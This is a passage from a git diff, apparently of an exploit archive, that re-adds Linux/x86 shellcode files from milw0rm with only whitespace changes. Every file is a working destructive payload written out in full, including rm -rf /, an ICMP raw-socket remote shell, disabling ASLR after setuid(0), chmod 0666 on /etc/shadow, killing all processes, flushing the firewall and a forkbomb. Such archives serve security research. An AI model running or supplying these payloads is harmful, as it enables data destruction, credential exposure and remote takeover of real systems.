stopped +132 bytes +written by onionring +*/ + +main() +{ + char shellcode[] = +"\x31\xC0" // xor eax, eax +"\x89\xC3" // mov ebx, eax +"\x89\xC1" // mov ecx, eax +"\x41" // inc ecx +"\xB0\x30" // mov al, 0x30 ; sys_signal +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\xFE\xC3" // inc bl +"\x80\xFB\x1F" // cmp bl, 0x1f +"\x72\xF3" // jb 0xf3 +"\x04\x40" // add al, 0x40 ; sys_getppid +"\xCD\x80" // int 0x80 +"\x89\xC2" // mov edx, eax +"\x31\xC0" // xor eax, eax +"\xB0\x02" // mov al, 0x2 ; sys_fork +"\xCD\x80" // int 0x80 +"\x39\xC0" // cmp eax, eax +"\x74\x08" // jnz 0x8 +"\x31\xC0" // xor eax, eax +"\x89\xC3" // mov ebx, eax +"\xB0\x01" // mov al, 0x1 ; sys_exit +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\xB0\x42" // mov al, 0x42 ; sys_setsid +"\xCD\x80" // int 0x80 +"\x43" // inc ebx +"\x39\xDA" // cmp edx, ebx +"\x74\x08" // jz 0x8 +"\x89\xD3" // mov ebx, edx +"\x31\xC0" // xor eax, eax +"\x04\x25" // add al, 0x25 ; sys_kill +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\x50" // push eax +"\x68\x6F\x67\x69\x6E" // push "ogin" +"\x68\x69\x6E\x2F\x6C" // push "in/l" +"\x68\x2F\x2F\x2F\x62" // push "///b" +"\x89\xE3" // mov ebx, esp +"\x31\xC0" // xor eax, eax +"\x04\x0A" // add al, 0xa ; sys_unlink +"\xCD\x80" // int 0x80 +"\x31\xC0" // xor eax, eax +"\x50" // push eax +"\x68\x2F\x2F\x2F\x2F" // push "////" +"\x89\xE2" // mov edx, esp +"\x50" // push eax +"\x68\x2D\x72\x66\x66" // push "-rff" +"\x89\xE1" // mov ecx, esp +"\x50" // push eax +"\x68\x6E\x2F\x72\x6D" // push "n/rm" +"\x68\x2F\x2F\x62\x69" // push "//bi" +"\x89\xE3" // mov ebx, esp +"\x50" // push eax +"\x52" // push edx +"\x51" // push ecx +"\x53" // push ebx +"\x89\xE1" // mov ecx, esp +"\x31\xD2" // xor edx, edx +"\x04\x0B" // add al, 0xb ; sys_execve +"\xCD\x80"; // int 0x80 + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-08-18] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13342.c b/platforms/lin_x86/shellcode/13342.c index 17e2712c6..7ab4e2a01 100755 --- a/platforms/lin_x86/shellcode/13342.c +++ b/platforms/lin_x86/shellcode/13342.c 
@@ -1,55 +1,55 @@ -/* - * Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") - * - * by LiquidWorm - * - * 2008 (c) www.zeroscience.org - * - * liquidworm [at] gmail.com - * - * 79 bytes. - * - */ - - -char sc[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - "\x6a\x2e" // push $0x2e - "\x58" // pop %eax - "\x53" // push %ebx - "\xcd\x80" // int $0x80 - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x70\x61\x63\x65" // push $0x65636170 - "\x76\x61\x5f\x73" // push $0x735f6176 - "\x69\x7a\x65\x5f" // push $0x5f657a69 - "\x6e\x64\x6f\x6d" // push $0x6d6f646e - "\x6c\x2f\x72\x61" // push $0x61722f6c - "\x65\x72\x6e\x65" // push $0x656e7265 - "\x73\x2f\x2f\x6b" // push $0x6b2f2f73 - "\x2f\x2f\x73\x79" // push $0x79732f2f - "\x70\x72\x6f\x63" // push $0x636f7270 - "\x20\x3e\x20\x2f" // push $0x2f203e20 - "\x68\x6f\x20\x30" // push $0x30206f68 - "\x2f\x2f\x65\x63" // push $0x63652f2f - "\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() -{ - int (*fp)() = (int(*)())sc; - printf("bytes: %u\n", strlen(sc)); - fp(); -} - +/* + * Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") + * + * by LiquidWorm + * + * 2008 (c) www.zeroscience.org + * + * liquidworm [at] gmail.com + * + * 79 bytes. 
+ * + */ + + +char sc[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x70\x61\x63\x65" // push $0x65636170 + "\x76\x61\x5f\x73" // push $0x735f6176 + "\x69\x7a\x65\x5f" // push $0x5f657a69 + "\x6e\x64\x6f\x6d" // push $0x6d6f646e + "\x6c\x2f\x72\x61" // push $0x61722f6c + "\x65\x72\x6e\x65" // push $0x656e7265 + "\x73\x2f\x2f\x6b" // push $0x6b2f2f73 + "\x2f\x2f\x73\x79" // push $0x79732f2f + "\x70\x72\x6f\x63" // push $0x636f7270 + "\x20\x3e\x20\x2f" // push $0x2f203e20 + "\x68\x6f\x20\x30" // push $0x30206f68 + "\x2f\x2f\x65\x63" // push $0x63652f2f + "\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() +{ + int (*fp)() = (int(*)())sc; + printf("bytes: %u\n", strlen(sc)); + fp(); +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13343.asm b/platforms/lin_x86/shellcode/13343.asm index 7e53c4a3b..851ec818a 100755 --- a/platforms/lin_x86/shellcode/13343.asm +++ b/platforms/lin_x86/shellcode/13343.asm 
@@ -1,199 +1,199 @@ -; -; Copyright (c) 2007 by -; -; 235-byte raw-socket ICMP/checksum shell - (x86-lnx) -; by mu-b - Nov 2006 -; -; icmp with identifier __flag_byte and commands in the -; following format:- -; "/bin/sh\x00-c\x00\x00" -; -; unlike *other* icmp shells, this will reply with -; 255-(sizeof icmp_hdr) bytes of output.. -; - -%define zero_reg esi -%define zero_reg_w si -%define sock_reg edi -%define __flag_byte 6996h - -global _shell - -_shell: - xor zero_reg, zero_reg - mov ebp, esp - - ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); -_socket: - lea ebx, [zero_reg+3] - push byte 1 - push ebx - dec ebx - push ebx - dec ebx - mov ecx, esp - lea eax, [zero_reg+66h] - int 80h ; socket(); - mov sock_reg, eax - - ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1); -_setsockopt: - push ebx - push esp - push byte 3h - push zero_reg - push sock_reg - mov ecx, esp - mov bl, byte 0eh - mov al, byte 66h - int 80h ; setsocketopt(); - - ; while(1) -_while_loop: - ; read(sockfd, cmd, 255); - cdq - dec byte dl - mov ecx, ebp - mov ebx, sock_reg - lea eax, [zero_reg+3] - int 80h ; read(); - - lea ebx, [ebp+24] - xor [ebx], word __flag_byte - jne short _while_loop - - ; pipe(pp) - lea ebx, [ebp-8] - mov al, byte 2ah - int 80h ; pipe(); - - ; fork() - mov al, byte 2h - int 80h ; fork(); - test eax, eax - jnz short _parent - -_child: - ; close(pp[0]) - mov ebx, [ebp-8] - mov al, byte 6h - int 80h ; close(); - - ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2); - lea ecx, [zero_reg+3] - ; pp[1] == pp[0]+1 - inc ebx - -.1: - dec ecx - mov al, byte 3fh - int 80h ; dup2(); - jnz .1 - - ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0); - push zero_reg - lea ebx, [ebp+39] - push ebx - sub ebx, byte 3 - push ebx - sub ebx, byte 8 - push ebx - mov ecx, esp - cdq - mov al, byte 0bh - int 80h ; execve(); - -_parent: - ; close(pp[1]) - mov ebx, [ebp-4] - lea eax, [zero_reg+6] - int 80h ; close(); - -_parent_read: -.1: - ; read(pp[0], cmd, bytes_left); - ; edx == 255 - 
lea ecx, [ebp+28] - mov ebx, [ebp-8] - mov al, byte 3h - int 80h ; read(); - test eax, eax - jl _while_loop - - mov al, byte 6h - int 80h ; close(); - -.2: - ; fix up ttl (optional?! make sure its high!) - ; mov [ebp+8], byte 0ffh - - ; switch ip's - mov ecx, [ebp+12] - xchg [ebp+16], ecx - mov [ebp+12], ecx - - ; set icmp type to echo reply (optional?!) - ;mov [ebp+20], word zero_reg_w - ; zero checksum - ;mov [ebp+22], word zero_reg_w - ; set icmp type to echo and zero checksum - mov [ebp+20], zero_reg - - lea ecx, [zero_reg+117] - lea esi, [ebp+20] - cdq - -.3: - lodsw - add edx, eax - loop .3 - - lodsb - xor ah, ah - add eax, edx - mov esi, eax - - shr eax, byte 16 - movzx esi, si - add eax, esi - mov edx, eax - shr edx, byte 16 - add eax, edx - not ax - - ; set checksum - mov [ebp+22], word ax - - cdq - xor eax, eax - xor zero_reg, zero_reg - - ; struct sockaddr * - push zero_reg - push zero_reg - push dword [ebp+16] - push byte 2 - - ; sendto(sockfd, cmd, 255, 0, ...); - mov ecx, esp - push byte 16 - push ecx - push zero_reg - mov dl, byte 0ffh - push edx - push ebp - push sock_reg - mov ecx, esp - mov bl, 0bh - mov al, 66h - int 80h ; sendto(); - - cdq - mov ecx, ebp - mov ebx, zero_reg - mov al, 72h - int 80h ; wait(); - - jmp _while_loop - +; +; Copyright (c) 2007 by +; +; 235-byte raw-socket ICMP/checksum shell - (x86-lnx) +; by mu-b - Nov 2006 +; +; icmp with identifier __flag_byte and commands in the +; following format:- +; "/bin/sh\x00-c\x00\x00" +; +; unlike *other* icmp shells, this will reply with +; 255-(sizeof icmp_hdr) bytes of output.. 
+; + +%define zero_reg esi +%define zero_reg_w si +%define sock_reg edi +%define __flag_byte 6996h + +global _shell + +_shell: + xor zero_reg, zero_reg + mov ebp, esp + + ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); +_socket: + lea ebx, [zero_reg+3] + push byte 1 + push ebx + dec ebx + push ebx + dec ebx + mov ecx, esp + lea eax, [zero_reg+66h] + int 80h ; socket(); + mov sock_reg, eax + + ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1); +_setsockopt: + push ebx + push esp + push byte 3h + push zero_reg + push sock_reg + mov ecx, esp + mov bl, byte 0eh + mov al, byte 66h + int 80h ; setsocketopt(); + + ; while(1) +_while_loop: + ; read(sockfd, cmd, 255); + cdq + dec byte dl + mov ecx, ebp + mov ebx, sock_reg + lea eax, [zero_reg+3] + int 80h ; read(); + + lea ebx, [ebp+24] + xor [ebx], word __flag_byte + jne short _while_loop + + ; pipe(pp) + lea ebx, [ebp-8] + mov al, byte 2ah + int 80h ; pipe(); + + ; fork() + mov al, byte 2h + int 80h ; fork(); + test eax, eax + jnz short _parent + +_child: + ; close(pp[0]) + mov ebx, [ebp-8] + mov al, byte 6h + int 80h ; close(); + + ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2); + lea ecx, [zero_reg+3] + ; pp[1] == pp[0]+1 + inc ebx + +.1: + dec ecx + mov al, byte 3fh + int 80h ; dup2(); + jnz .1 + + ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0); + push zero_reg + lea ebx, [ebp+39] + push ebx + sub ebx, byte 3 + push ebx + sub ebx, byte 8 + push ebx + mov ecx, esp + cdq + mov al, byte 0bh + int 80h ; execve(); + +_parent: + ; close(pp[1]) + mov ebx, [ebp-4] + lea eax, [zero_reg+6] + int 80h ; close(); + +_parent_read: +.1: + ; read(pp[0], cmd, bytes_left); + ; edx == 255 + lea ecx, [ebp+28] + mov ebx, [ebp-8] + mov al, byte 3h + int 80h ; read(); + test eax, eax + jl _while_loop + + mov al, byte 6h + int 80h ; close(); + +.2: + ; fix up ttl (optional?! make sure its high!) 
+ ; mov [ebp+8], byte 0ffh + + ; switch ip's + mov ecx, [ebp+12] + xchg [ebp+16], ecx + mov [ebp+12], ecx + + ; set icmp type to echo reply (optional?!) + ;mov [ebp+20], word zero_reg_w + ; zero checksum + ;mov [ebp+22], word zero_reg_w + ; set icmp type to echo and zero checksum + mov [ebp+20], zero_reg + + lea ecx, [zero_reg+117] + lea esi, [ebp+20] + cdq + +.3: + lodsw + add edx, eax + loop .3 + + lodsb + xor ah, ah + add eax, edx + mov esi, eax + + shr eax, byte 16 + movzx esi, si + add eax, esi + mov edx, eax + shr edx, byte 16 + add eax, edx + not ax + + ; set checksum + mov [ebp+22], word ax + + cdq + xor eax, eax + xor zero_reg, zero_reg + + ; struct sockaddr * + push zero_reg + push zero_reg + push dword [ebp+16] + push byte 2 + + ; sendto(sockfd, cmd, 255, 0, ...); + mov ecx, esp + push byte 16 + push ecx + push zero_reg + mov dl, byte 0ffh + push edx + push ebp + push sock_reg + mov ecx, esp + mov bl, 0bh + mov al, 66h + int 80h ; sendto(); + + cdq + mov ecx, ebp + mov ebx, zero_reg + mov al, 72h + int 80h ; wait(); + + jmp _while_loop + ; milw0rm.com [2007-04-02] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13344.c b/platforms/lin_x86/shellcode/13344.c index 3e97e4e9f..6aa0533fc 100755 --- a/platforms/lin_x86/shellcode/13344.c +++ b/platforms/lin_x86/shellcode/13344.c 
@@ -1,45 +1,45 @@
-/* By Kris Katterjohn 11/18/2006
- *
- * 40 byte shellcode to flush iptables for Linux x86
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- *
- * ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL)
- *
- * push byte 11
- * pop eax
- * cdq
- * push edx
- * push word 0x462d
- * mov ecx, esp
- * push edx
- * push word 0x7365
- * push 0x6c626174
- * push 0x70692f6e
- * push 0x6962732f
- * mov ebx, esp
- * push edx
- * push ecx
- * push ebx
- * mov ecx, esp
- * int 0x80
- */
-
-main()
-{
- char shellcode[] =
- "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
- "\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62"
- "\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
- "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
-
- (*(void (*)()) shellcode)();
-}
-
+/* By Kris Katterjohn 11/18/2006
+ *
+ * 40 byte shellcode to flush iptables for Linux x86
+ *
+ *
+ *
+ * section .text
+ *
+ * global _start
+ *
+ * _start:
+ *
+ * ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL)
+ *
+ * push byte 11
+ * pop eax
+ * cdq
+ * push edx
+ * push word 0x462d
+ * mov ecx, esp
+ * push edx
+ * push word 0x7365
+ * push 0x6c626174
+ * push 0x70692f6e
+ * push 0x6962732f
+ * mov ebx, esp
+ * push edx
+ * push ecx
+ * push ebx
+ * mov ecx, esp
+ * int 0x80
+ */
+
+main()
+{
+ char shellcode[] =
+ "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
+ "\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62"
+ "\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
+ "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+ (*(void (*)()) shellcode)();
+}
+
 // milw0rm.com [2007-03-09]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13345.c b/platforms/lin_x86/shellcode/13345.c
index 3cb89e537..332c6f6fa 100755
--- a/platforms/lin_x86/shellcode/13345.c
+++ b/platforms/lin_x86/shellcode/13345.c
@@ -1,31 +1,31 @@
-/* By Kris Katterjohn 11/13/2006
- *
- * 11 byte shellcode to kill all processes for Linux/x86
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- *
- * ; kill(-1, SIGKILL)
- *
- * push byte 37
- * pop eax
- * push byte -1
- * pop ebx
- * push byte 9
- * pop ecx
- * int 0x80
- */
-
-main()
-{
- char shellcode[] = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80";
-
- (*(void (*)()) shellcode)();
-}
-
+/* By Kris Katterjohn 11/13/2006
+ *
+ * 11 byte shellcode to kill all processes for Linux/x86
+ *
+ *
+ *
+ * section .text
+ *
+ * global _start
+ *
+ * _start:
+ *
+ * ; kill(-1, SIGKILL)
+ *
+ * push byte 37
+ * pop eax
+ * push byte -1
+ * pop ebx
+ * push byte 9
+ * pop ecx
+ * int 0x80
+ */
+
+main()
+{
+ char shellcode[] = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80";
+
+ (*(void (*)()) shellcode)();
+}
+
 // milw0rm.com [2007-03-09]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13346.s b/platforms/lin_x86/shellcode/13346.s
index 6abfe7bd6..7cb7a0181 100755
--- a/platforms/lin_x86/shellcode/13346.s
+++ b/platforms/lin_x86/shellcode/13346.s
@@ -1,77 +1,77 @@ -# XCHG Research Group -# Linux/x86 execve read shellcode - 92 bytes -# -# -# )--[ Writed by 0ut0fbound ]--( -# -# - http://outofbound.host.sk -# - http://xchglabs.host.sk - -.text - - .globl _start - -_start: - -# EAX = 0x04 -> syscall write() - xorl %eax, %eax - movb $0x4, %al - xorl %ebx, %ebx - inc %ebx - pushl $0x20202020 - pushl $0x3a646e61 - pushl $0x6d6d6f43 - movl %esp, %ecx - xorl %edx, %edx - movb $0x9, %dl - int $0x80 - -# EAX = 0x03 -> syscall read() - xorl %eax, %eax - movb $0x3, %al - xorl %ebx, %ebx - xorl %edx, %edx - movb $0x20, %dl - subl %edx, %esp - movl %esp, %ecx - int $0x80 - -# buffer[read(0, buffer, sizeof(buffer))] = 0; - addl %eax, %ecx - dec %ecx - movl %ebx, (%ecx) - - movl %esp, %ebx - addl %eax, %ebx - movl %eax, %ecx - - xorl %edx, %edx - push %edx - -LOOP1: - movb (%ebx), %al - cmp $0x20, %al - jne CONT - xorb $0x20, (%ebx) - inc %ebx - pushl %ebx - dec %ebx -CONT: - dec %ebx -loop LOOP1 - - push %ebx - - movl %esp, %ecx - xorl %eax, %eax - movb $0xb, %al - - int $0x80 - -# EAX = 0x01 -> syscall exit - xorl %eax, %eax - inc %al - xorl %ebx, %ebx - int $0x80 - +# XCHG Research Group +# Linux/x86 execve read shellcode - 92 bytes +# +# +# )--[ Writed by 0ut0fbound ]--( +# +# - http://outofbound.host.sk +# - http://xchglabs.host.sk + +.text + + .globl _start + +_start: + +# EAX = 0x04 -> syscall write() + xorl %eax, %eax + movb $0x4, %al + xorl %ebx, %ebx + inc %ebx + pushl $0x20202020 + pushl $0x3a646e61 + pushl $0x6d6d6f43 + movl %esp, %ecx + xorl %edx, %edx + movb $0x9, %dl + int $0x80 + +# EAX = 0x03 -> syscall read() + xorl %eax, %eax + movb $0x3, %al + xorl %ebx, %ebx + xorl %edx, %edx + movb $0x20, %dl + subl %edx, %esp + movl %esp, %ecx + int $0x80 + +# buffer[read(0, buffer, sizeof(buffer))] = 0; + addl %eax, %ecx + dec %ecx + movl %ebx, (%ecx) + + movl %esp, %ebx + addl %eax, %ebx + movl %eax, %ecx + + xorl %edx, %edx + push %edx + +LOOP1: + movb (%ebx), %al + cmp $0x20, %al + jne CONT + xorb $0x20, (%ebx) + 
inc %ebx + pushl %ebx + dec %ebx +CONT: + dec %ebx +loop LOOP1 + + push %ebx + + movl %esp, %ecx + xorl %eax, %eax + movb $0xb, %al + + int $0x80 + +# EAX = 0x01 -> syscall exit + xorl %eax, %eax + inc %al + xorl %ebx, %ebx + int $0x80 + # milw0rm.com [2006-11-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13347.c b/platforms/lin_x86/shellcode/13347.c index df1ef0fbd..38411bb2d 100755 --- a/platforms/lin_x86/shellcode/13347.c +++ b/platforms/lin_x86/shellcode/13347.c 
@@ -1,45 +1,45 @@
-/* By Kris Katterjohn 11/18/2006
- *
- * 40 byte shellcode to flush ipchains for Linux x86
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- *
- * ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL)
- *
- * push byte 11
- * pop eax
- * cdq
- * push edx
- * push word 0x462d
- * mov ecx, esp
- * push edx
- * push word 0x736e
- * push 0x69616863
- * push 0x70692f6e
- * push 0x6962732f
- * mov ebx, esp
- * push edx
- * push ecx
- * push ebx
- * mov ecx, esp
- * int 0x80
- */
-
-main()
-{
- char shellcode[] =
- "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
- "\xe1\x52\x66\x68\x6e\x73\x68\x63\x68\x61"
- "\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
- "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
-
- (*(void (*)()) shellcode)();
-}
-
+/* By Kris Katterjohn 11/18/2006
+ *
+ * 40 byte shellcode to flush ipchains for Linux x86
+ *
+ *
+ *
+ * section .text
+ *
+ * global _start
+ *
+ * _start:
+ *
+ * ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL)
+ *
+ * push byte 11
+ * pop eax
+ * cdq
+ * push edx
+ * push word 0x462d
+ * mov ecx, esp
+ * push edx
+ * push word 0x736e
+ * push 0x69616863
+ * push 0x70692f6e
+ * push 0x6962732f
+ * mov ebx, esp
+ * push edx
+ * push ecx
+ * push ebx
+ * mov ecx, esp
+ * int 0x80
+ */
+
+main()
+{
+ char shellcode[] =
+ "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
+ "\xe1\x52\x66\x68\x6e\x73\x68\x63\x68\x61"
+ "\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
+ "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+ (*(void (*)()) shellcode)();
+}
+
 // milw0rm.com [2006-11-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13348.c b/platforms/lin_x86/shellcode/13348.c
index 2713768f0..8d4a166d3 100755
--- a/platforms/lin_x86/shellcode/13348.c
+++ b/platforms/lin_x86/shellcode/13348.c
@@ -1,39 +1,39 @@ -/* By Kris Katterjohn 11/18/2006 - * - * 12 byte shellcode to set system time to 0 and exit. No real damage :) - * - * exit() code is the last 5 bytes (0x6a - 0x80) - * - * for Linux/x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; stime([0]) - * - * push byte 25 - * pop eax - * cdq - * push edx - * mov ebx, esp - * int 0x80 - * - * ; exit() - * - * inc eax - * int 0x80 - */ - -main() -{ - char shellcode[] = "\x6a\x19\x58\x99\x52\x89\xe3\xcd\x80\x40\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/18/2006 + * + * 12 byte shellcode to set system time to 0 and exit. No real damage :) + * + * exit() code is the last 5 bytes (0x6a - 0x80) + * + * for Linux/x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; stime([0]) + * + * push byte 25 + * pop eax + * cdq + * push edx + * mov ebx, esp + * int 0x80 + * + * ; exit() + * + * inc eax + * int 0x80 + */ + +main() +{ + char shellcode[] = "\x6a\x19\x58\x99\x52\x89\xe3\xcd\x80\x40\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13350.c b/platforms/lin_x86/shellcode/13350.c index 72dfc18e8..715e59a9f 100755 --- a/platforms/lin_x86/shellcode/13350.c +++ b/platforms/lin_x86/shellcode/13350.c 
@@ -1,43 +1,43 @@ -/* By Kris Katterjohn 8/29/2006 - * - * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86 - * - * To remove exit(): Remove the last 5 bytes (0x6a - 0x80) - * - * - * - * section .text - * - * global _start - * - * _start: - * xor edx, edx - * - * push byte 15 - * pop eax - * push edx - * push byte 0x77 - * push word 0x6f64 - * push 0x6168732f - * push 0x6374652f - * mov ebx, esp - * push word 0666Q - * pop ecx - * int 0x80 - * - * push byte 1 - * pop eax - * int 0x80 - */ - -main() -{ - char shellcode[] = - "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68" - "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68" - "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 8/29/2006 + * + * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86 + * + * To remove exit(): Remove the last 5 bytes (0x6a - 0x80) + * + * + * + * section .text + * + * global _start + * + * _start: + * xor edx, edx + * + * push byte 15 + * pop eax + * push edx + * push byte 0x77 + * push word 0x6f64 + * push 0x6168732f + * push 0x6374652f + * mov ebx, esp + * push word 0666Q + * pop ecx + * int 0x80 + * + * push byte 1 + * pop eax + * int 0x80 + */ + +main() +{ + char shellcode[] = + "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68" + "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68" + "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13351.c b/platforms/lin_x86/shellcode/13351.c index b8acad746..866d1dd7b 100755 --- a/platforms/lin_x86/shellcode/13351.c +++ b/platforms/lin_x86/shellcode/13351.c 
@@ -1,25 +1,25 @@
-/* By Kris Katterjohn 8/29/2006
- *
- * 7 byte shellcode for a forkbomb
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- * push byte 2
- * pop eax
- * int 0x80
- * jmp short _start
- */
-
-main()
-{
- char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";
-
- (*(void (*)()) shellcode)();
-}
-
+/* By Kris Katterjohn 8/29/2006
+ *
+ * 7 byte shellcode for a forkbomb
+ *
+ *
+ *
+ * section .text
+ *
+ * global _start
+ *
+ * _start:
+ * push byte 2
+ * pop eax
+ * int 0x80
+ * jmp short _start
+ */
+
+main()
+{
+ char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";
+
+ (*(void (*)()) shellcode)();
+}
+
 // milw0rm.com [2006-11-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13352.c b/platforms/lin_x86/shellcode/13352.c
index 1978606de..1be0821b4 100755
--- a/platforms/lin_x86/shellcode/13352.c
+++ b/platforms/lin_x86/shellcode/13352.c
@@ -1,50 +1,50 @@
-/* By Kris Katterjohn 11/18/2006
- *
- * 45 byte shellcode to execve("rm -rf /") for Linux/x86
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- *
- * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
- *
- * push byte 11
- * pop eax
- * cdq
- * push edx
- * push byte 0x2f
- * mov edi, esp
- * push edx
- * push word 0x662d
- * mov esi, esp
- * push edx
- * push word 0x722d
- * mov ecx, esp
- * push edx
- * push 0x6d722f2f
- * push 0x6e69622f
- * mov ebx, esp
- * push edx
- * push edi
- * push esi
- * push ecx
- * push ebx
- * mov ecx, esp
- * int 0x80
- */
-
-main()
-{
- char shellcode[] =
- "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
- "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
- "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
-
- (*(void (*)()) shellcode)();
-}
-
+/* By Kris Katterjohn 11/18/2006
+ *
+ * 45 byte shellcode to execve("rm -rf /") for Linux/x86
+ *
+ *
+ *
+ * section .text
+ *
+ * global _start
+ *
+ * _start:
+ *
+ * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
+ *
+ * push byte 11
+ * pop eax
+ * cdq
+ * push edx
+ * push byte 0x2f
+ * mov edi, esp
+ * push edx
+ * push word 0x662d
+ * mov esi, esp
+ * push edx
+ * push word 0x722d
+ * mov ecx, esp
+ * push edx
+ * push 0x6d722f2f
+ * push 0x6e69622f
+ * mov ebx, esp
+ * push edx
+ * push edi
+ * push esi
+ * push ecx
+ * push ebx
+ * mov ecx, esp
+ * int 0x80
+ */
+
+main()
+{
+ char shellcode[] =
+ "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
+ "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
+ "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
+
+ (*(void (*)()) shellcode)();
+}
+
 // milw0rm.com [2006-11-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13353.c b/platforms/lin_x86/shellcode/13353.c
index 0b2712040..d50783b9a 100755
--- a/platforms/lin_x86/shellcode/13353.c
+++ b/platforms/lin_x86/shellcode/13353.c 
